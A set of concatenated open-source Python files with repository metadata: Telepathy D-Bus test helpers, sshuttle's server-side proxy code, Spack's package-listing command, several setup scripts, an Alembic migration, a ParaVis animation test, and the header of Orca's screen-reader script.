for t in [unicode, str, long, int, float]:
if isinstance(x, t):
return t(x)
return x
def call_async(test, proxy, method, *args, **kw):
"""Call a D-Bus method asynchronously and generate an event for the
resulting method return/error."""
def reply_func(*ret):
test.handle_event(Event('dbus-return', method=method,
value=unwrap(ret)))
def error_func(err):
test.handle_event(Event('dbus-error', method=method, error=err,
name=err.get_dbus_name(), message=err.message))
method_proxy = getattr(proxy, method)
kw.update({'reply_handler': reply_func, 'error_handler': error_func})
method_proxy(*args, **kw)
def sync_dbus(bus, q, conn):
# Dummy D-Bus method call
# This won't do the right thing unless the proxy has a unique name.
assert conn.object.bus_name.startswith(':')
root_object = bus.get_object(conn.object.bus_name, '/')
call_async(
q, dbus.Interface(root_object, 'org.freedesktop.DBus.Peer'), 'Ping')
q.expect('dbus-return', method='Ping')
class ProxyWrapper:
def __init__(self, object, default, others):
self.object = object
self.default_interface = dbus.Interface(object, default)
self.Properties = dbus.Interface(object, dbus.PROPERTIES_IFACE)
self.TpProperties = \
dbus.Interface(object, tp_name_prefix + '.Properties')
self.interfaces = dict([
(name, dbus.Interface(object, iface))
for name, iface in others.iteritems()])
def __getattr__(self, name):
if name in self.interfaces:
return self.interfaces[name]
if name in self.object.__dict__:
return getattr(self.object, name)
return getattr(self.default_interface, name)
def wrap_connection(conn):
return ProxyWrapper(conn, tp_name_prefix + '.Connection',
dict([
(name, tp_name_prefix + '.Connection.Interface.' + name)
for name in ['Aliasing', 'Avatars', 'Capabilities', 'Contacts',
'Presence', 'SimplePresence', 'Requests']] +
[('Peer', 'org.freedesktop.DBus.Peer'),
('ContactCapabilities', cs.CONN_IFACE_CONTACT_CAPS),
('Location', cs.CONN_IFACE_LOCATION),
]))
def wrap_channel(chan, type_, extra=None):
interfaces = {
type_: tp_name_prefix + '.Channel.Type.' + type_,
'Group': tp_name_prefix + '.Channel.Interface.Group',
}
if extra:
interfaces.update(dict([
(name, tp_name_prefix + '.Channel.Interface.' + name)
for name in extra]))
return ProxyWrapper(chan, tp_name_prefix + '.Channel', interfaces)
def make_connection(bus, event_func, name, proto, params):
cm = bus.get_object(
tp_name_prefix + '.ConnectionManager.%s' % name,
tp_path_prefix + '/ConnectionManager/%s' % name)
cm_iface = dbus.Interface(cm, tp_name_prefix + '.ConnectionManager')
connection_name, connection_path = cm_iface.RequestConnection(
proto, params)
conn = wrap_connection(bus.get_object(connection_name, connection_path))
bus.add_signal_receiver(
lambda *args, **kw:
event_func(
Event('dbus-signal',
path=unwrap(kw['path']),
signal=kw['member'], args=map(unwrap, args),
interface=kw['interface'])),
None, # signal name
None, # interface
cm._named_service,
path_keyword='path',
member_keyword='member',
interface_keyword='interface',
byte_arrays=True
)
return conn
def make_channel_proxy(conn, path, iface):
bus = dbus.SessionBus()
chan = bus.get_object(conn.object.bus_name, path)
chan = dbus.Interface(chan, tp_name_prefix + '.' + iface)
return chan
# block_reading can be used if the test want to choose when we start to read
# data from the socket.
class EventProtocol(Protocol):
def __init__(self, queue=None, block_reading=False):
self.queue = queue
self.block_reading = block_reading
def dataReceived(self, data):
if self.queue is not None:
self.queue.handle_event(Event('socket-data', protocol=self,
data=data))
def sendData(self, data):
self.transport.write(data)
def connectionMade(self):
if self.block_reading:
self.transport.stopReading()
def connectionLost(self, reason=None):
if self.queue is not None:
self.queue.handle_event(Event('socket-disconnected', protocol=self))
class EventProtocolFactory(Factory):
def __init__(self, queue, block_reading=False):
self.queue = queue
self.block_reading = block_reading
def _create_protocol(self):
return EventProtocol(self.queue, self.block_reading)
def buildProtocol(self, addr):
proto = self._create_protocol()
self.queue.handle_event(Event('socket-connected', protocol=proto))
return proto
class EventProtocolClientFactory(EventProtocolFactory, ClientFactory):
pass
def watch_tube_signals(q, tube):
def got_signal_cb(*args, **kwargs):
q.handle_event(Event('tube-signal',
path=kwargs['path'],
signal=kwargs['member'],
args=map(unwrap, args),
tube=tube))
tube.add_signal_receiver(got_signal_cb,
path_keyword='path', member_keyword='member',
byte_arrays=True)
def pretty(x):
return pprint.pformat(unwrap(x))
def assertEquals(expected, value):
if expected != value:
raise AssertionError(
"expected:\n%s\ngot:\n%s" % (pretty(expected), pretty(value)))
def assertNotEquals(expected, value):
if expected == value:
raise AssertionError(
"expected something other than:\n%s" % pretty(value))
def assertContains(element, value):
if element not in value:
raise AssertionError(
"expected:\n%s\nin:\n%s" % (pretty(element), pretty(value)))
def assertDoesNotContain(element, value):
if element in value:
raise AssertionError(
"expected:\n%s\nnot in:\n%s" % (pretty(element), pretty(value)))
def assertLength(length, value):
if len(value) != length:
raise AssertionError("expected: length %d, got length %d:\n%s" % (
length, len(value), pretty(value)))
def assertFlagsSet(flags, value):
masked = value & flags
if masked != flags:
raise AssertionError(
"expected flags %u, of which only %u are set in %u" % (
flags, masked, value))
def assertFlagsUnset(flags, value):
masked = value & flags
if masked != 0:
raise AssertionError(
"expected none of flags %u, but %u are set in %u" % (
flags, masked, value))
def install_colourer():
def red(s):
return '\x1b[31m%s\x1b[0m' % s
def green(s):
return '\x1b[32m%s\x1b[0m' % s
patterns = {
'handled': green,
'not handled': red,
}
class Colourer:
def __init__(self, fh, patterns):
self.fh = fh
self.patterns = patterns
def write(self, s):
f = self.patterns.get(s, lambda x: x)
self.fh.write(f(s))
sys.stdout = Colourer(sys.stdout, patterns)
return sys.stdout
if __name__ == '__main__':
unittest.main()
|
community-ssu/telepathy-gabble
|
tests/twisted/servicetest.py
|
Python
|
lgpl-2.1
| 15,082
|
from setuptools import setup, find_packages
import pbs
setup(
name = pbs.__projectname__,
version = pbs.__release__,
packages = find_packages(),
author = pbs.__authors__,
author_email = pbs.__authoremails__,
description = pbs.__description__,
license = "GPLv2",
keywords = pbs.__keywords__,
entry_points = {
'console_scripts': [
'pstat = pbs.pstat:main',
'psub = pbs.psub:main',
'taskmaster = pbs.taskmaster:main',
],
},
)
|
demis001/pbs
|
setup.py
|
Python
|
lgpl-2.1
| 517
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Matt Jeffery <matt@clan.se>
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import warnings
import logging
import collections
log = logging.getLogger(__name__)
class APIRelationship(object):
"""
Define a relationship between to entities
"""
def __init__(self, related_entity, use_list=True, *args, **kwargs):
"""
Setup the relationship
"""
self.related_entity = related_entity
self.use_list = use_list
self._parent = None
def copy(self):
relation = APIRelationship(self.related_entity)
relation._parent = self._parent
return relation
@property
def parent(self):
if self._parent is None:
raise RuntimeError("parent must be set, has the class been setup correctly?")
else:
return self._parent
@parent.setter
def parent(self, parent):
self._parent = parent
@property
def related_entity_name(self):
return "_"+(self.related_entity.__apiclass_plural__ if self.use_list else self.related_entity.__apiclass__)
def __call__(self):
"""
Return the related entities from the API
"""
relation_attr = self.related_entity_name
if not hasattr(self.parent, relation_attr) or getattr(self.parent, relation_attr) is None:
path = "{cls}/{id}/{rel_cls}/".format(cls=self.parent.clsname,
id=self.parent.id,
rel_cls=self.related_entity.__apiclass__)
reply = self.parent.session.request(path)
if self.use_list:
if isinstance(reply, collections.Iterable):
setattr(self.parent, relation_attr, reply)
else:
# for the relationship in to a list
setattr(self.parent, relation_attr, [reply])
else:
if isinstance(reply, collections.Iterable):
# force the relationship out of a list and raise a warning
warnings.warn("relationship was not expecting a list result, perhaps this is no a 1:1 relationship", stacklevel=2)
setattr(self.parent, relation_attr, reply[0] if len(reply) > 0 else None)
else:
setattr(self.parent, relation_attr, reply)
return getattr(self.parent, relation_attr)
|
mattjeffery/semetric-python
|
semetric/apiclient/util.py
|
Python
|
lgpl-2.1
| 3,202
|
import re, struct, socket, select, traceback, time
if not globals().get('skip_imports'):
import ssnet, helpers, hostwatch
import compat.ssubprocess as ssubprocess
from ssnet import SockWrapper, Handler, Proxy, Mux, MuxWrapper
from helpers import *
def _ipmatch(ipstr):
if ipstr == 'default':
ipstr = '0.0.0.0/0'
m = re.match(r'^(\d+(\.\d+(\.\d+(\.\d+)?)?)?)(?:/(\d+))?$', ipstr)
if m:
g = m.groups()
ips = g[0]
width = int(g[4] or 32)
if g[1] == None:
ips += '.0.0.0'
width = min(width, 8)
elif g[2] == None:
ips += '.0.0'
width = min(width, 16)
elif g[3] == None:
ips += '.0'
width = min(width, 24)
return (struct.unpack('!I', socket.inet_aton(ips))[0], width)
def _ipstr(ip, width):
if width >= 32:
return ip
else:
return "%s/%d" % (ip, width)
def _maskbits(netmask):
if not netmask:
return 32
for i in range(32):
if netmask[0] & _shl(1, i):
return 32-i
return 0
def _shl(n, bits):
return n * int(2**bits)
def _list_routes():
argv = ['netstat', '-rn']
p = ssubprocess.Popen(argv, stdout=ssubprocess.PIPE)
routes = []
for line in p.stdout:
cols = re.split(r'\s+', line)
ipw = _ipmatch(cols[0])
if not ipw:
continue # some lines won't be parseable; never mind
maskw = _ipmatch(cols[2]) # linux only
mask = _maskbits(maskw) # returns 32 if maskw is null
width = min(ipw[1], mask)
ip = ipw[0] & _shl(_shl(1, width) - 1, 32-width)
routes.append((socket.AF_INET, socket.inet_ntoa(struct.pack('!I', ip)), width))
rv = p.wait()
if rv != 0:
log('WARNING: %r returned %d\n' % (argv, rv))
log('WARNING: That prevents --auto-nets from working.\n')
return routes
def list_routes():
for (family, ip,width) in _list_routes():
if not ip.startswith('0.') and not ip.startswith('127.'):
yield (family, ip,width)
def _exc_dump():
exc_info = sys.exc_info()
return ''.join(traceback.format_exception(*exc_info))
def start_hostwatch(seed_hosts):
s1,s2 = socket.socketpair()
pid = os.fork()
if not pid:
# child
rv = 99
try:
try:
s2.close()
os.dup2(s1.fileno(), 1)
os.dup2(s1.fileno(), 0)
s1.close()
rv = hostwatch.hw_main(seed_hosts) or 0
except Exception, e:
log('%s\n' % _exc_dump())
rv = 98
finally:
os._exit(rv)
s1.close()
return pid,s2
class Hostwatch:
def __init__(self):
self.pid = 0
self.sock = None
class DnsProxy(Handler):
def __init__(self, mux, chan, request):
# FIXME! IPv4 specific
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
Handler.__init__(self, [sock])
self.timeout = time.time()+30
self.mux = mux
self.chan = chan
self.tries = 0
self.peer = None
self.request = request
self.sock = sock
# FIXME! IPv4 specific
self.sock.setsockopt(socket.SOL_IP, socket.IP_TTL, 42)
self.try_send()
def try_send(self):
if self.tries >= 3:
return
self.tries += 1
# FIXME! Support IPv6 nameservers
self.peer = resolvconf_random_nameserver()[1]
self.sock.connect((self.peer, 53))
debug2('DNS: sending to %r\n' % self.peer)
try:
self.sock.send(self.request)
except socket.error, e:
if e.args[0] in ssnet.NET_ERRS:
# might have been spurious; try again.
# Note: these errors sometimes are reported by recv(),
# and sometimes by send(). We have to catch both.
debug2('DNS send to %r: %s\n' % (self.peer, e))
self.try_send()
return
else:
log('DNS send to %r: %s\n' % (self.peer, e))
return
def callback(self):
try:
data = self.sock.recv(4096)
except socket.error, e:
if e.args[0] in ssnet.NET_ERRS:
# might have been spurious; try again.
# Note: these errors sometimes are reported by recv(),
# and sometimes by send(). We have to catch both.
debug2('DNS recv from %r: %s\n' % (self.peer, e))
self.try_send()
return
else:
log('DNS recv from %r: %s\n' % (self.peer, e))
return
debug2('DNS response: %d bytes\n' % len(data))
self.mux.send(self.chan, ssnet.CMD_DNS_RESPONSE, data)
self.ok = False
class UdpProxy(Handler):
def __init__(self, mux, chan, family):
sock = socket.socket(family, socket.SOCK_DGRAM)
Handler.__init__(self, [sock])
self.timeout = time.time()+30
self.mux = mux
self.chan = chan
self.sock = sock
if family == socket.AF_INET:
self.sock.setsockopt(socket.SOL_IP, socket.IP_TTL, 42)
def send(self, dstip, data):
debug2('UDP: sending to %r port %d\n' % dstip)
try:
self.sock.sendto(data,dstip)
except socket.error, e:
log('UDP send to %r port %d: %s\n' % (dstip[0], dstip[1], e))
return
def callback(self):
try:
data,peer = self.sock.recvfrom(4096)
except socket.error, e:
log('UDP recv from %r port %d: %s\n' % (peer[0], peer[1], e))
return
debug2('UDP response: %d bytes\n' % len(data))
hdr = "%s,%r,"%(peer[0], peer[1])
self.mux.send(self.chan, ssnet.CMD_UDP_DATA, hdr+data)
def main():
if helpers.verbose >= 1:
helpers.logprefix = ' s: '
else:
helpers.logprefix = 'server: '
debug1('latency control setting = %r\n' % latency_control)
routes = list(list_routes())
debug1('available routes:\n')
for r in routes:
debug1(' %d/%s/%d\n' % r)
# synchronization header
sys.stdout.write('\0\0SSHUTTLE0001')
sys.stdout.flush()
handlers = []
mux = Mux(socket.fromfd(sys.stdin.fileno(),
socket.AF_INET, socket.SOCK_STREAM),
socket.fromfd(sys.stdout.fileno(),
socket.AF_INET, socket.SOCK_STREAM))
handlers.append(mux)
routepkt = ''
for r in routes:
routepkt += '%d,%s,%d\n' % r
mux.send(0, ssnet.CMD_ROUTES, routepkt)
hw = Hostwatch()
hw.leftover = ''
def hostwatch_ready():
assert(hw.pid)
content = hw.sock.recv(4096)
if content:
lines = (hw.leftover + content).split('\n')
if lines[-1]:
# no terminating newline: entry isn't complete yet!
hw.leftover = lines.pop()
lines.append('')
else:
hw.leftover = ''
mux.send(0, ssnet.CMD_HOST_LIST, '\n'.join(lines))
else:
raise Fatal('hostwatch process died')
def got_host_req(data):
if not hw.pid:
(hw.pid,hw.sock) = start_hostwatch(data.strip().split())
handlers.append(Handler(socks = [hw.sock],
callback = hostwatch_ready))
mux.got_host_req = got_host_req
def new_channel(channel, data):
(family,dstip,dstport) = data.split(',', 2)
family = int(family)
dstport = int(dstport)
outwrap = ssnet.connect_dst(family, dstip, dstport)
handlers.append(Proxy(MuxWrapper(mux, channel), outwrap))
mux.new_channel = new_channel
dnshandlers = {}
def dns_req(channel, data):
debug2('Incoming DNS request channel=%d.\n' % channel)
h = DnsProxy(mux, channel, data)
handlers.append(h)
dnshandlers[channel] = h
mux.got_dns_req = dns_req
udphandlers = {}
def udp_req(channel, cmd, data):
debug2('Incoming UDP request channel=%d, cmd=%d\n' % (channel,cmd))
if cmd == ssnet.CMD_UDP_DATA:
(dstip,dstport,data) = data.split(",",2)
dstport = int(dstport)
debug2('is incoming UDP data. %r %d.\n' % (dstip,dstport))
h = udphandlers[channel]
h.send((dstip,dstport),data)
elif cmd == ssnet.CMD_UDP_CLOSE:
debug2('is incoming UDP close\n')
h = udphandlers[channel]
h.ok = False
del mux.channels[channel]
def udp_open(channel, data):
debug2('Incoming UDP open.\n')
family = int(data)
mux.channels[channel] = lambda cmd, data: udp_req(channel, cmd, data)
if channel in udphandlers:
raise Fatal('UDP connection channel %d already open'%channel)
else:
h = UdpProxy(mux, channel, family)
handlers.append(h)
udphandlers[channel] = h
mux.got_udp_open = udp_open
while mux.ok:
if hw.pid:
assert(hw.pid > 0)
(rpid, rv) = os.waitpid(hw.pid, os.WNOHANG)
if rpid:
raise Fatal('hostwatch exited unexpectedly: code 0x%04x\n' % rv)
ssnet.runonce(handlers, mux)
if latency_control:
mux.check_fullness()
mux.callback()
if dnshandlers:
now = time.time()
for channel,h in dnshandlers.items():
if h.timeout < now or not h.ok:
debug3('expiring dnsreqs channel=%d\n' % channel)
del dnshandlers[channel]
h.sock.close()
h.ok = False
for channel,h in udphandlers.items():
if not h.ok:
debug3('expiring UDP channel=%d\n' % channel)
del udphandlers[channel]
h.sock.close()
h.ok = False
|
brianmay/sshuttle
|
src/server.py
|
Python
|
lgpl-2.1
| 10,097
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
from io import open
from os.path import abspath, dirname, join
from setuptools import setup
PROJECT_ROOT = abspath(dirname(__file__))
with open(join(PROJECT_ROOT, 'README.rst'), encoding='utf-8') as f:
readme = f.read()
version = (
[l for l in open(join(PROJECT_ROOT, 'zeroconf.py')) if '__version__' in l][0]
.split('=')[-1]
.strip().strip('\'"')
)
setup(
name='zeroconf',
version=version,
description='Pure Python Multicast DNS Service Discovery Library '
'(Bonjour/Avahi compatible)',
long_description=readme,
author='Paul Scott-Murphy, William McBrine, Jakub Stasiak',
url='https://github.com/jstasiak/python-zeroconf',
py_modules=['zeroconf'],
platforms=['unix', 'linux', 'osx'],
license='LGPL',
zip_safe=False,
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: GNU Lesser General Public License v2 (LGPLv2)',
'Operating System :: POSIX',
'Operating System :: POSIX :: Linux',
'Operating System :: MacOS :: MacOS X',
'Topic :: Software Development :: Libraries',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
],
keywords=[
'Bonjour', 'Avahi', 'Zeroconf', 'Multicast DNS', 'Service Discovery',
'mDNS',
],
install_requires=[
'enum-compat',
'netifaces',
'six',
],
)
|
nameoftherose/python-zeroconf
|
setup.py
|
Python
|
lgpl-2.1
| 1,982
|
"""Cull removed rules
Revision ID: 2136a1f22f1f
Revises: 2ea9623b21fa
Create Date: 2015-01-08 12:23:51.829172
"""
from __future__ import print_function
# revision identifiers, used by Alembic.
revision = '2136a1f22f1f'
down_revision = '2ea9623b21fa'
from alembic import op
import sqlalchemy as sa
import fmn.lib.models
def upgrade():
engine = op.get_bind().engine
session = sa.orm.scoped_session(sa.orm.sessionmaker(bind=engine))
# Find all rules that got removed in this PR and nuke them
# https://github.com/fedora-infra/fmn.rules/pull/21
goners = [
'fmn.rules:pkgdb_acl_user_remove',
'fmn.rules:pkgdb_branch_clone',
'fmn.rules:pkgdb_package_retire',
]
for path in goners:
rules = session.query(fmn.lib.models.Rule)\
.filter_by(code_path=path).all()
for rule in rules:
print("Deleting %r." % rule)
session.delete(rule)
# And one of them wasn't actually removed, it was just renamed.
moves = [
('fmn.rules:pkgdb_critpath_update',
'fmn.rules:pkgdb_package_critpath_update'),
]
for src, dest in moves:
rules = session.query(fmn.lib.models.Rule)\
.filter_by(code_path=src).all()
for rule in rules:
rule.code_path = dest
session.commit()
def downgrade():
pass
|
fedora-infra/fmn
|
alembic/versions/2136a1f22f1f_cull_removed_rules.py
|
Python
|
lgpl-2.1
| 1,355
|
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# See http://www.salome-platform.org/ or email : webmaster.salome@opencascade.com
#
# This case corresponds to: /visu/animation/A1 case
# Test animation API
import sys
import os
from paravistest import *
from presentations import *
from pvsimple import *
import pvserver as paravis
my_paravis = paravis.myParavis
# 1. TimeStamps.med import
print 'Importing "TimeStamps.med"................',
file_path = datadir + "TimeStamps.med"
OpenDataFile(file_path)
med_reader = GetActiveSource()
if med_reader is None:
print "FAILED"
else:
print "OK"
# 2. CutLines creation
print "Creating Cut Lines........................",
med_field = "vitesse"
cutlines = CutLinesOnField(med_reader, EntityType.NODE, med_field, 1,
nb_lines = 20,
orientation1=Orientation.XY, orientation2=Orientation.ZX)
if cutlines is None:
print "FAILED"
else:
print "OK"
# 3. Display CutLines
print "Getting a Viewer.........................",
view = GetRenderView()
if view is None:
print "FAILED"
else:
print "OK"
cutlines.Visibility = 1
Render(view=view)
cutlines.Visibility = 0
Render(view=view)
display_only(cutlines, view=view)
reset_view(view=view)
# 4. Animation
print "Get Animation scene.....................",
scene = GetAnimationScene()
if scene is None:
print "FAILED"
else:
print "OK"
print "Duration default... ", scene.Duration
scene.Duration = -10
scene.Duration = 120
scene.Duration = 0
scene.Duration = 30
print "Duration ... ", scene.Duration
print "Loop ... ", scene.Loop
scene.Loop = 1
print "Loop ... ", scene.Loop
scene.Loop = 0
print "Loop ... ", scene.Loop
print "AnimationTime ... ", scene.AnimationTime
scene.Play()
scene.GoToFirst()
scene.GoToNext()
scene.GoToNext()
print "AnimationTime ... ", scene.AnimationTime
scene.GoToPrevious()
scene.GoToLast()
scene.Stop()
print "AnimationTime ... ", scene.AnimationTime
scene.AnimationTime = -1
scene.AnimationTime = scene.TimeKeeper.TimestepValues[1]
scene.AnimationTime = scene.TimeKeeper.TimestepValues[0]
nb_frames = scene.NumberOfFrames
print "NumberOfFrames ... ", nb_frames
|
FedoraScientific/salome-paravis
|
test/VisuPrs/Animation/A1.py
|
Python
|
lgpl-2.1
| 2,899
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from __future__ import print_function
from __future__ import division
import argparse
import fnmatch
import os
import re
import sys
import math
import json
import llnl.util.tty as tty
from llnl.util.tty.colify import colify
import spack.dependency
import spack.repo
import spack.cmd.common.arguments as arguments
from spack.version import VersionList
if sys.version_info > (3, 1):
from html import escape # novm
else:
from cgi import escape
description = "list and search available packages"
section = "basic"
level = "short"
formatters = {}
def formatter(func):
"""Decorator used to register formatters"""
formatters[func.__name__] = func
return func
def setup_parser(subparser):
subparser.add_argument(
'filter', nargs=argparse.REMAINDER,
help='optional case-insensitive glob patterns to filter results')
subparser.add_argument(
'-d', '--search-description', action='store_true', default=False,
help='filtering will also search the description for a match')
subparser.add_argument(
'--format', default='name_only', choices=formatters,
help='format to be used to print the output [default: name_only]')
subparser.add_argument(
'--update', metavar='FILE', default=None, action='store',
help='write output to the specified file, if any package is newer')
arguments.add_common_arguments(subparser, ['tags'])
def filter_by_name(pkgs, args):
"""
Filters the sequence of packages according to user prescriptions
Args:
pkgs: sequence of packages
args: parsed command line arguments
Returns:
filtered and sorted list of packages
"""
if args.filter:
res = []
for f in args.filter:
if '*' not in f and '?' not in f:
r = fnmatch.translate('*' + f + '*')
else:
r = fnmatch.translate(f)
rc = re.compile(r, flags=re.IGNORECASE)
res.append(rc)
if args.search_description:
def match(p, f):
if f.match(p):
return True
pkg = spack.repo.get(p)
if pkg.__doc__:
return f.match(pkg.__doc__)
return False
else:
def match(p, f):
return f.match(p)
pkgs = [p for p in pkgs if any(match(p, f) for f in res)]
return sorted(pkgs, key=lambda s: s.lower())
@formatter
def name_only(pkgs, out):
indent = 0
if out.isatty():
tty.msg("%d packages." % len(pkgs))
colify(pkgs, indent=indent, output=out)
def github_url(pkg):
"""Link to a package file on github."""
url = 'https://github.com/spack/spack/blob/develop/var/spack/repos/builtin/packages/{0}/package.py'
return url.format(pkg.name)
def rows_for_ncols(elts, ncols):
"""Print out rows in a table with ncols of elts laid out vertically."""
clen = int(math.ceil(len(elts) / ncols))
for r in range(clen):
row = []
for c in range(ncols):
i = c * clen + r
row.append(elts[i] if i < len(elts) else None)
yield row
def get_dependencies(pkg):
all_deps = {}
for deptype in spack.dependency.all_deptypes:
deps = pkg.dependencies_of_type(deptype)
all_deps[deptype] = [d for d in deps]
return all_deps
@formatter
def version_json(pkg_names, out):
"""Print all packages with their latest versions."""
pkgs = [spack.repo.get(name) for name in pkg_names]
out.write('[\n')
# output name and latest version for each package
pkg_latest = ",\n".join([
' {{"name": "{0}",\n'
' "latest_version": "{1}",\n'
' "versions": {2},\n'
' "homepage": "{3}",\n'
' "file": "{4}",\n'
' "maintainers": {5},\n'
' "dependencies": {6}'
'}}'.format(
pkg.name,
VersionList(pkg.versions).preferred(),
json.dumps([str(v) for v in reversed(sorted(pkg.versions))]),
pkg.homepage,
github_url(pkg),
json.dumps(pkg.maintainers),
json.dumps(get_dependencies(pkg))
) for pkg in pkgs
])
out.write(pkg_latest)
# important: no trailing comma in JSON arrays
out.write('\n]\n')
@formatter
def html(pkg_names, out):
"""Print out information on all packages in Sphinx HTML.
This is intended to be inlined directly into Sphinx documentation.
We write HTML instead of RST for speed; generating RST from *all*
packages causes the Sphinx build to take forever. Including this as
raw HTML is much faster.
"""
# Read in all packages
pkgs = [spack.repo.get(name) for name in pkg_names]
# Start at 2 because the title of the page from Sphinx is id1.
span_id = 2
# HTML header with an increasing id span
def head(n, span_id, title, anchor=None):
if anchor is None:
anchor = title
out.write(('<span id="id%d"></span>'
'<h1>%s<a class="headerlink" href="#%s" '
'title="Permalink to this headline">¶</a>'
'</h1>\n') % (span_id, title, anchor))
# Start with the number of packages, skipping the title and intro
# blurb, which we maintain in the RST file.
out.write('<p>\n')
out.write('Spack currently has %d mainline packages:\n' % len(pkgs))
out.write('</p>\n')
# Table of links to all packages
out.write('<table border="1" class="docutils">\n')
out.write('<tbody valign="top">\n')
for i, row in enumerate(rows_for_ncols(pkg_names, 3)):
out.write('<tr class="row-odd">\n' if i % 2 == 0 else
'<tr class="row-even">\n')
for name in row:
out.write('<td>\n')
out.write('<a class="reference internal" href="#%s">%s</a></td>\n'
% (name, name))
out.write('</td>\n')
out.write('</tr>\n')
out.write('</tbody>\n')
out.write('</table>\n')
out.write('<hr class="docutils"/>\n')
# Output some text for each package.
for pkg in pkgs:
out.write('<div class="section" id="%s">\n' % pkg.name)
head(2, span_id, pkg.name)
span_id += 1
out.write('<dl class="docutils">\n')
out.write('<dt>Homepage:</dt>\n')
out.write('<dd><ul class="first last simple">\n')
out.write(('<li>'
'<a class="reference external" href="%s">%s</a>'
'</li>\n') % (pkg.homepage, escape(pkg.homepage, True)))
out.write('</ul></dd>\n')
out.write('<dt>Spack package:</dt>\n')
out.write('<dd><ul class="first last simple">\n')
out.write(('<li>'
'<a class="reference external" href="%s">%s/package.py</a>'
'</li>\n') % (github_url(pkg), pkg.name))
out.write('</ul></dd>\n')
if pkg.versions:
out.write('<dt>Versions:</dt>\n')
out.write('<dd>\n')
out.write(', '.join(
str(v) for v in reversed(sorted(pkg.versions))))
out.write('\n')
out.write('</dd>\n')
for deptype in spack.dependency.all_deptypes:
deps = pkg.dependencies_of_type(deptype)
if deps:
out.write('<dt>%s Dependencies:</dt>\n' % deptype.capitalize())
out.write('<dd>\n')
out.write(', '.join(
d if d not in pkg_names else
'<a class="reference internal" href="#%s">%s</a>' % (d, d)
for d in deps))
out.write('\n')
out.write('</dd>\n')
out.write('<dt>Description:</dt>\n')
out.write('<dd>\n')
out.write(escape(pkg.format_doc(indent=2), True))
out.write('\n')
out.write('</dd>\n')
out.write('</dl>\n')
out.write('<hr class="docutils"/>\n')
out.write('</div>\n')
def list(parser, args):
# retrieve the formatter to use from args
formatter = formatters[args.format]
# Retrieve the names of all the packages
pkgs = set(spack.repo.all_package_names())
# Filter the set appropriately
sorted_packages = filter_by_name(pkgs, args)
# Filter by tags
if args.tags:
packages_with_tags = set(
spack.repo.path.packages_with_tags(*args.tags))
sorted_packages = set(sorted_packages) & packages_with_tags
sorted_packages = sorted(sorted_packages)
if args.update:
# change output stream if user asked for update
if os.path.exists(args.update):
if os.path.getmtime(args.update) > spack.repo.path.last_mtime():
tty.msg('File is up to date: %s' % args.update)
return
tty.msg('Updating file: %s' % args.update)
with open(args.update, 'w') as f:
formatter(sorted_packages, f)
else:
# Print to stdout
formatter(sorted_packages, sys.stdout)
|
rspavel/spack
|
lib/spack/spack/cmd/list.py
|
Python
|
lgpl-2.1
| 9,244
|
# Orca
#
# Copyright 2004-2009 Sun Microsystems Inc.
# Copyright 2010 Joanmarie Diggs
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
"""The default Script for presenting information to the user using
both speech and Braille. This is based primarily on the de-facto
standard implementation of the AT-SPI, which is the GAIL support
for GTK."""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2004-2009 Sun Microsystems Inc." \
"Copyright (c) 2010 Joanmarie Diggs"
__license__ = "LGPL"
import time
from gi.repository import Gtk, Gdk
import pyatspi
import orca.braille as braille
import orca.chnames as chnames
import orca.cmdnames as cmdnames
import orca.debug as debug
import orca.eventsynthesizer as eventsynthesizer
import orca.find as find
import orca.flat_review as flat_review
import orca.guilabels as guilabels
import orca.input_event as input_event
import orca.keybindings as keybindings
import orca.messages as messages
import orca.orca as orca
import orca.orca_gui_commandlist as commandlist
import orca.orca_state as orca_state
import orca.phonnames as phonnames
import orca.sound_utils as sound_utils
import orca.script as script
import orca.settings as settings
import orca.settings_manager as settings_manager
import orca.speech as speech
import orca.speechserver as speechserver
import orca.mouse_review as mouse_review
import orca.notification_messages as notification_messages
_settingsManager = settings_manager.getManager()
########################################################################
# #
# The Default script class. #
# #
########################################################################
class Script(script.Script):
EMBEDDED_OBJECT_CHARACTER = '\ufffc'
